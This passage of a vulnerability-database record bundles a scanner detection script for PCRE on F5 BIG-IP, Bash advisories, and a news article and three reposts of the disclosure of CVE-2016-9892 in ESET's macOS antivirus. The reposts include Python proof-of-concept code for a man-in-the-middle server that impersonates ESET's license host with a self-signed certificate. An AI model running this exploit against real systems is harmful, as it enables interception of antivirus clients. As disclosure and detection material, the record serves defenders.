vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n script_tag(name:\"summary\", value:\"Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.\");\n script_tag(name:\"impact\", value:\"A local, authenticated attacker may be able to provide malicious input in the configuration to exploit this vulnerability. There is no data plane exposure to this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 10:27:32 +0100 (Tue, 07 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;');\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;');\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.3.0-11.6.1;',\n 'unaffected', '13.0.0;');\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;',\n 'unaffected', '13.0.0;');\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;');\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;');\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;');\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.3.0-11.6.1;',\n 'unaffected', '13.0.0;');\n\nif( report = is_f5_vulnerable( ca:check_f5, version:version ) )\n{\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "cloudfoundry": [{"lastseen": "2018-09-07T03:26:08", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nBernd Dietzel discovered that Bash incorrectly expanded the hostname when displaying the prompt. If a remote attacker were able to modify a hostname, this flaw could be exploited to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-0634](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-0634>))\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4 environment variables. A local attacker could use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-7543](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7543>))\n\nIt was discovered that Bash incorrectly handled the popd command. A remote attacker could possibly use this issue to bypass restricted shells. ([CVE-2016-9401](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9401>))\n\nIt was discovered that Bash incorrectly handled path autocompletion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 17.04. ([CVE-2017-5932](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-5932>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3263.x versions prior to 3263.26\n * 3312.x versions prior to 3312.26\n * 3363.x versions prior to 3363.24\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.122.0\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3263.x versions to 3263.26 or later\n * Upgrade 3312.x versions to 3312.26 or later\n * Upgrade 3363.x versions to 3363.24 or later\n * All other stemcells should be upgraded to the latest version.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.122.0 or later.\n\n# References\n\n * [USN-3294-1](<http://www.ubuntu.com/usn/usn-3294-1/>)\n * [CVE-2016-0634](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-0634>)\n * [CVE-2016-7543](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7543>)\n * [CVE-2016-9401](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9401>)\n * [CVE-2017-5932](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-5932>)\n * [bosh.io](<https://bosh.io>)\n", "modified": "2017-06-02T00:00:00", "published": "2017-06-02T00:00:00", "id": "CFOUNDRY:550B80029A731B9F485A20D2CDC3D5E4", "href": "https://www.cloudfoundry.org/blog/usn-3294-1/", "title": "USN-3294-1: Bash vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:51", "bulletinFamily": "unix", "description": "Bernd Dietzel discovered that Bash incorrectly expanded the hostname when displaying the prompt. If a remote attacker were able to modify a hostname, this flaw could be exploited to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-0634)\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4 environment variables. A local attacker could use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543)\n\nIt was discovered that Bash incorrectly handled the popd command. A remote attacker could possibly use this issue to bypass restricted shells. (CVE-2016-9401)\n\nIt was discovered that Bash incorrectly handled path autocompletion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 17.04. (CVE-2017-5932)", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "USN-3294-1", "href": "https://usn.ubuntu.com/3294-1/", "title": "Bash vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:23", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-MHDgtVc76Vs/WLWDwtATcAI/AAAAAAAAriU/QIIRXHkFfpsrppdZnhUBp-u2f1_E7_IcgCLcB/s1600/mac-antivirus.png>)\n\nWhat could be more exciting for hackers than exploiting a vulnerability in a widely used software without having to struggle too much? \n \nOne such easy-to-exploit, but critical vulnerability has been discovered in ESET's antivirus software that could allow any unauthenticated attackers to remotely execute arbitrary code with root privileges on a Mac system. \n \nThe critical security flaw, tracked as CVE-2016-9892, in ESET Endpoint Antivirus 6 for macOS was discovered by Google Security Team's researchers Jason Geffner and Jan Bee at the beginning of November 2016. \n \nAs detailed in the [full disclosure](<http://seclists.org/fulldisclosure/2017/Feb/68>), all a hacker needs to get root-level remote code execution on a Mac computer is to intercept the ESET antivirus package's connection to its backend servers using a self-signed HTTPS certificate, put himself in as a man-in-the-middle (MITM) attacker, and exploit an XML library flaw. \n \nThe actual issue was related to a service named esets_daemon, which runs as root. The service is statically linked with an outdated version of the POCO XML parser library, version 1.4.6p1 released in March 2013. \n \nThis POCO version is based on a version of the Expat XML parser library version 2.0.1 from 2007, which is affected by a publicly known XML parsing vulnerability ([CVE-2016-0718](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0718>)) that could allow an attacker to execute arbitrary code via malicious XML content. \n \nNow, when esets_daemon sent a request to https://edf.eset.com/edf during activation of the ESET Endpoint Antivirus product, an MITM attacker can intercept the request to deliver a malformed XML document using a self-signed HTTPS certificate. \n \nThis event triggers the CVE-2016-0718 flaw that executes the malicious code with root privileges when esets_daemon parsed the XML content. \n \nThis attack was possible because the ESET antivirus did not validate the web server's certificate. \n \nHere's what the duo explain: \n \n\"Vulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an outdated XML parsing library and do not perform proper server authentication, allowing for remote unauthenticated attackers to perform arbitrary code execution as root on vulnerable clients.\" \n \nNow since the hacker controls the connection, they can send malicious content to the Mac computer in order to hijack the XML parser and execute code as root. \n \nThe Google researchers have also released the proof-of-concept (PoC) exploit code, which only shows how the ESET antivirus app can be used to cause a crash. \n \nESET addressed this vulnerability on February 21 by upgrading the POCO parsing library and by configuring its product to verify SSL certificates. \n \nThe patch is made available in the release of [version 6.4.168.0](<https://www.eset.com/za/download/business/detail/family/67/>) of ESET Endpoint Antivirus for macOS. So, make sure your antivirus package is patched up to date. \n", "modified": "2017-02-28T14:06:04", "published": "2017-02-28T03:06:00", "id": "THN:F95BED040A4B56A9B0A6D552DB79AEE2", "href": "https://thehackernews.com/2017/02/eset-antivirus-mac.html", "type": "thn", "title": "Critical Flaw in ESET Antivirus Exposes Mac Users to Remote Hacking", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-06T03:41:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2017-02-28T00:00:00", "published": "2017-02-28T00:00:00", "href": "https://0day.today/exploit/description/27146", "id": "1337DAY-ID-27146", "type": "zdt", "title": "ESET Endpoint Antivirus 6 Remote Code Execution Exploit", "sourceData": "CVE-2016-9892 - Remote Code Execution as Root via ESET Endpoint Antivirus 6\r\n---------------------------------------------------------------------------\r\n\r\nSummary\r\n=======\r\nName: Remote Code Execution as Root via ESET Endpoint Antivirus 6\r\nCVE: CVE-2016-9892\r\nDiscoverers: Jason Geffner and Jan Bee\r\nVendor: ESET\r\nProduct: ESET Endpoint Antivirus 6 for macOS\r\nRisk: Critical\r\nDiscovery Date: 2016-11-03\r\nPublication Data: 2017-02-27\r\nFixed Version: 6.4.168.0\r\n\r\nIntroduction\r\n============\r\nPer ESET's online material, \"ESET Endpoint Antivirus for OS X delivers award-\r\nwinning cross-platform protection for multi-platform environments. It protects\r\nagainst malware and spyware and shields end users from fake websites phishing\r\nfor sensitive information such as usernames, passwords or credit card details.\r\nUnauthorized devices can be blocked from the system entirely. The solution's\r\nhighly intuitive interface allows for quick navigation.\"\r\n\r\nVulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an\r\noutdated XML parsing library and do not perform proper server authentication,\r\nallowing for remote unauthenticated attackers to perform arbitrary code\r\nexecution as root on vulnerable clients.\r\n\r\nVulnerability\r\n=============\r\nThe esets_daemon service, which runs as root, is statically linked with an\r\noutdated version of the POCO XML parser library (https://pocoproject.org/) --\r\nversion 1.4.6p1 from 2013-03-06. This version of POCO is based on Expat\r\n(http://expat.sourceforge.net/) version 2.0.1 from 2007-06-05, which has a\r\npublicly known XML parsing vulnerability (CVE-2016-0718) that allows for\r\narbitrary code execution via malformed XML content.\r\n\r\nWhen ESET Endpoint Antivirus tries to activate its license, esets_daemon sends a\r\nrequest to https://edf.eset.com/edf. The esets_daemon service does not validate\r\nthe web server's certificate, so a man-in-the-middle can intercept the request\r\nand respond using a self-signed HTTPS certificate. The esets_daemon service\r\nparses the response as an XML document, thereby allowing the attacker to supply\r\nmalformed content and exploit CVE-2016-0718 to achieve arbitrary code execution\r\nas root.\r\n\r\nProof of Concept\r\n================\r\nExtract overflow.xml from https://bugzilla.suse.com/attachment.cgi?id=676490\r\n(ZIP file containing a public proof-of-concept for CVE-2016-0718) and run the\r\nfollowing Python program:\r\n________________________________________________________________________________\r\nimport BaseHTTPServer, SimpleHTTPServer, ssl, subprocess\r\n\r\nclass XmlHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\ndef do_POST(self):\r\nwith open(\"overflow.xml\") as f:\r\nxml = f.read()\r\nself.send_response(200)\r\nself.send_header(\"Content-Type\", \"text/xml\")\r\nself.send_header(\"Content-Length\", len(xml))\r\nself.end_headers()\r\nself.wfile.write(xml)\r\n\r\ndef do_CONNECT(self):\r\nself.wfile.write(\"HTTP/1.1 200 Connection Established\\r\\n\")\r\nself.end_headers()\r\nself.connection = ssl.wrap_socket(\r\nself.connection, certfile=\"/tmp/xml.crt\",\r\nkeyfile=\"/tmp/xml.key\", server_side=True)\r\nself.rfile = self.connection.makefile(\"rb\", self.rbufsize)\r\nself.wfile = self.connection.makefile(\"wb\", self.wbufsize)\r\nself.close_connection = 0\r\n\r\nsubprocess.call(\"openssl req -newkey rsa:2048 -x509 -nodes -subj \" +\r\n\"/CN=edf.eset.com -out /tmp/xml.crt -keyout /tmp/xml.key\",\r\nshell=True)\r\n\r\nBaseHTTPServer.HTTPServer((\"localhost\", 4443), XmlHandler).serve_forever()\r\n________________________________________________________________________________\r\n\r\nNext, open the ESET Endpoint Antivirus UI, choose \"Setup --> Enter application\r\npreferences...\", and enable a local proxy server for localhost:4443 (this proxy\r\nconfiguration is used to simulate a man-in-the-middle attack; a real-world\r\nattack would not require a victim to enable a proxy server).\r\n\r\nNext, in the ESET Endpoint Antivirus UI, choose \"Help --> Activate Product\",\r\nenter any License Key value you like (such as 0000-0000-0000-0000-0000), and\r\npress \"Activate\".\r\n\r\nThe esets_daemon process will immediately crash (the public PoC overflow.xml\r\nfile used above just demonstrates that the vulnerability exists; it does not\r\nperform actual code execution). You can confirm this by running\r\n/Applications/Utilities/Console.app/Contents/MacOS/Console and seeing that\r\nesets_daemon crashed.\r\n\r\nMitigation\r\n==========\r\nESET patched this vulnerability in ESET Endpoint Antivirus version 6.4.168.0.\r\n\r\n>From the product's change log on\r\nhttps://www.eset.com/us/business/endpoint-security/mac-antivirus/:\r\n\r\nVersion 6.4.168.0\r\n- Added: Product verifies ESET SSL certificate on all supported OS X/macOS\r\n- Added: Upgraded POCO parsing library to the latest build\r\n\r\nDiscoverers\r\n===========\r\nThis vulnerability was discovered and reported to ESET by Jason Geffner and Jan\r\nBee of the Google Security Team.\r\n\r\nTimeline\r\n========\r\n2016-11-03 - Vulnerability discovered\r\n2016-11-03 - Vulnerability reported to ESET Security Team\r\n2016-11-10 - Phone call between Google and ESET to discuss vulnerability\r\n2016-02-08 - ESET provided Google with updated build\r\n2016-02-21 - Google confirmed vulnerability remediated\r\n2016-02-21 - ESET publicly released version 6.4.168.0\r\n2016-02-27 - Public disclosure\n\n# 0day.today [2018-04-06] #", "sourceHref": "https://0day.today/exploit/27146", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T12:01:24", "bulletinFamily": "exploit", "description": "Introduction\r\n============\r\nPer ESET's online material, \"ESET Endpoint Antivirus for OS X delivers award-\r\nwinning cross-platform protection for multi-platform environments. It protects\r\nagainst malware and spyware and shields end users from fake websites phishing\r\nfor sensitive information such as usernames, passwords or credit card details.\r\nUnauthorized devices can be blocked from the system entirely. The solution's\r\nhighly intuitive interface allows for quick navigation.\"\r\n\r\nVulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an\r\noutdated XML parsing library and do not perform proper server authentication,\r\nallowing for remote unauthenticated attackers to perform arbitrary code\r\nexecution as root on vulnerable clients.\r\n\r\nVulnerability\r\n=============\r\nThe esets_daemon service, which runs as root, is statically linked with an\r\noutdated version of the POCO XML parser library (https://pocoproject.org/) --\r\nversion 1.4.6p1 from 2013-03-06. This version of POCO is based on Expat\r\n(http://expat.sourceforge.net/) version 2.0.1 from 2007-06-05, which has a\r\npublicly known XML parsing vulnerability (CVE-2016-0718) that allows for\r\narbitrary code execution via malformed XML content.\r\n\r\nWhen ESET Endpoint Antivirus tries to activate its license, esets_daemon sends a\r\nrequest to https://edf.eset.com/edf. The esets_daemon service does not validate\r\nthe web server's certificate, so a man-in-the-middle can intercept the request\r\nand respond using a self-signed HTTPS certificate. The esets_daemon service\r\nparses the response as an XML document, thereby allowing the attacker to supply\r\nmalformed content and exploit CVE-2016-0718 to achieve arbitrary code execution\r\nas root.", "modified": "2017-02-28T00:00:00", "published": "2017-02-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92725", "id": "SSV:92725", "type": "seebug", "title": "Remote Code Execution as Root via ESET Endpoint Antivirus 6\uff08CVE-2016-9892\uff09", "sourceData": "\n # Extract overflow.xml from https://bugzilla.suse.com/attachment.cgi?id=676490\r\n# (ZIP file containing a public proof-of-concept for CVE-2016-0718) and run the\r\n# following Python program:\r\n\r\nimport BaseHTTPServer, SimpleHTTPServer, ssl, subprocess\r\n\r\nclass XmlHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_POST(self):\r\n with open(\"overflow.xml\") as f:\r\n xml = f.read()\r\n self.send_response(200)\r\n self.send_header(\"Content-Type\", \"text/xml\")\r\n self.send_header(\"Content-Length\", len(xml))\r\n self.end_headers()\r\n self.wfile.write(xml)\r\n\r\n def do_CONNECT(self):\r\n self.wfile.write(\"HTTP/1.1 200 Connection Established\\r\\n\")\r\n self.end_headers()\r\n self.connection = ssl.wrap_socket(\r\n self.connection, certfile=\"/tmp/xml.crt\",\r\n keyfile=\"/tmp/xml.key\", server_side=True)\r\n self.rfile = self.connection.makefile(\"rb\", self.rbufsize)\r\n self.wfile = self.connection.makefile(\"wb\", self.wbufsize)\r\n self.close_connection = 0\r\n\r\nsubprocess.call(\"openssl req -newkey rsa:2048 -x509 -nodes -subj \" +\r\n \"/CN=edf.eset.com -out /tmp/xml.crt -keyout /tmp/xml.key\",\r\n shell=True)\r\n\r\nBaseHTTPServer.HTTPServer((\"localhost\", 4443), XmlHandler).serve_forever()\r\n#________________________________________________________________________________\r\n# \r\n# Next, open the ESET Endpoint Antivirus UI, choose \"Setup --> Enter application\r\n# preferences...\", and enable a local proxy server for localhost:4443 (this proxy\r\n# configuration is used to simulate a man-in-the-middle attack; a real-world\r\n# attack would not require a victim to enable a proxy server).\r\n# \r\n# Next, in the ESET Endpoint Antivirus UI, choose \"Help --> Activate Product\",\r\n# enter any License Key value you like (such as 0000-0000-0000-0000-0000), and\r\n# press \"Activate\".\r\n# \r\n# The esets_daemon process will immediately crash (the public PoC overflow.xml\r\n# file used above just demonstrates that the vulnerability exists; it does not\r\n# perform actual code execution). You can confirm this by running\r\n# /Applications/Utilities/Console.app/Contents/MacOS/Console and seeing that\r\n# esets_daemon crashed.\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92725"}], "packetstorm": [{"lastseen": "2017-02-28T00:52:41", "bulletinFamily": "exploit", "description": "", "modified": "2017-02-27T00:00:00", "published": "2017-02-27T00:00:00", "href": "https://packetstormsecurity.com/files/141350/ESET-Endpoint-Antivirus-6-Remote-Code-Execution.html", "id": "PACKETSTORM:141350", "type": "packetstorm", "title": "ESET Endpoint Antivirus 6 Remote Code Execution", "sourceData": "`CVE-2016-9892 - Remote Code Execution as Root via ESET Endpoint Antivirus 6 \n--------------------------------------------------------------------------- \n \nSummary \n======= \nName: Remote Code Execution as Root via ESET Endpoint Antivirus 6 \nCVE: CVE-2016-9892 \nDiscoverers: Jason Geffner and Jan Bee \nVendor: ESET \nProduct: ESET Endpoint Antivirus 6 for macOS \nRisk: Critical \nDiscovery Date: 2016-11-03 \nPublication Data: 2017-02-27 \nFixed Version: 6.4.168.0 \n \nIntroduction \n============ \nPer ESET's online material, \"ESET Endpoint Antivirus for OS X delivers award- \nwinning cross-platform protection for multi-platform environments. It protects \nagainst malware and spyware and shields end users from fake websites phishing \nfor sensitive information such as usernames, passwords or credit card details. \nUnauthorized devices can be blocked from the system entirely. The solution's \nhighly intuitive interface allows for quick navigation.\" \n \nVulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an \noutdated XML parsing library and do not perform proper server authentication, \nallowing for remote unauthenticated attackers to perform arbitrary code \nexecution as root on vulnerable clients. \n \nVulnerability \n============= \nThe esets_daemon service, which runs as root, is statically linked with an \noutdated version of the POCO XML parser library (https://pocoproject.org/) -- \nversion 1.4.6p1 from 2013-03-06. This version of POCO is based on Expat \n(http://expat.sourceforge.net/) version 2.0.1 from 2007-06-05, which has a \npublicly known XML parsing vulnerability (CVE-2016-0718) that allows for \narbitrary code execution via malformed XML content. \n \nWhen ESET Endpoint Antivirus tries to activate its license, esets_daemon sends a \nrequest to https://edf.eset.com/edf. The esets_daemon service does not validate \nthe web server's certificate, so a man-in-the-middle can intercept the request \nand respond using a self-signed HTTPS certificate. The esets_daemon service \nparses the response as an XML document, thereby allowing the attacker to supply \nmalformed content and exploit CVE-2016-0718 to achieve arbitrary code execution \nas root. \n \nProof of Concept \n================ \nExtract overflow.xml from https://bugzilla.suse.com/attachment.cgi?id=676490 \n(ZIP file containing a public proof-of-concept for CVE-2016-0718) and run the \nfollowing Python program: \n________________________________________________________________________________ \nimport BaseHTTPServer, SimpleHTTPServer, ssl, subprocess \n \nclass XmlHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): \ndef do_POST(self): \nwith open(\"overflow.xml\") as f: \nxml = f.read() \nself.send_response(200) \nself.send_header(\"Content-Type\", \"text/xml\") \nself.send_header(\"Content-Length\", len(xml)) \nself.end_headers() \nself.wfile.write(xml) \n \ndef do_CONNECT(self): \nself.wfile.write(\"HTTP/1.1 200 Connection Established\\r\\n\") \nself.end_headers() \nself.connection = ssl.wrap_socket( \nself.connection, certfile=\"/tmp/xml.crt\", \nkeyfile=\"/tmp/xml.key\", server_side=True) \nself.rfile = self.connection.makefile(\"rb\", self.rbufsize) \nself.wfile = self.connection.makefile(\"wb\", self.wbufsize) \nself.close_connection = 0 \n \nsubprocess.call(\"openssl req -newkey rsa:2048 -x509 -nodes -subj \" + \n\"/CN=edf.eset.com -out /tmp/xml.crt -keyout /tmp/xml.key\", \nshell=True) \n \nBaseHTTPServer.HTTPServer((\"localhost\", 4443), XmlHandler).serve_forever() \n________________________________________________________________________________ \n \nNext, open the ESET Endpoint Antivirus UI, choose \"Setup --> Enter application \npreferences...\", and enable a local proxy server for localhost:4443 (this proxy \nconfiguration is used to simulate a man-in-the-middle attack; a real-world \nattack would not require a victim to enable a proxy server). \n \nNext, in the ESET Endpoint Antivirus UI, choose \"Help --> Activate Product\", \nenter any License Key value you like (such as 0000-0000-0000-0000-0000), and \npress \"Activate\". \n \nThe esets_daemon process will immediately crash (the public PoC overflow.xml \nfile used above just demonstrates that the vulnerability exists; it does not \nperform actual code execution). You can confirm this by running \n/Applications/Utilities/Console.app/Contents/MacOS/Console and seeing that \nesets_daemon crashed. \n \nMitigation \n========== \nESET patched this vulnerability in ESET Endpoint Antivirus version 6.4.168.0. \n \n>From the product's change log on \nhttps://www.eset.com/us/business/endpoint-security/mac-antivirus/: \n \nVersion 6.4.168.0 \n- Added: Product verifies ESET SSL certificate on all supported OS X/macOS \n- Added: Upgraded POCO parsing library to the latest build \n \nDiscoverers \n=========== \nThis vulnerability was discovered and reported to ESET by Jason Geffner and Jan \nBee of the Google Security Team. \n \nTimeline \n======== \n2016-11-03 - Vulnerability discovered \n2016-11-03 - Vulnerability reported to ESET Security Team \n2016-11-10 - Phone call between Google and ESET to discuss vulnerability \n2016-02-08 - ESET provided Google with updated build \n2016-02-21 - Google confirmed vulnerability remediated \n2016-02-21 - ESET publicly released version 6.4.168.0 \n2016-02-27 - Public disclosure \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/141350/esetendpointav6-exec.txt"}]}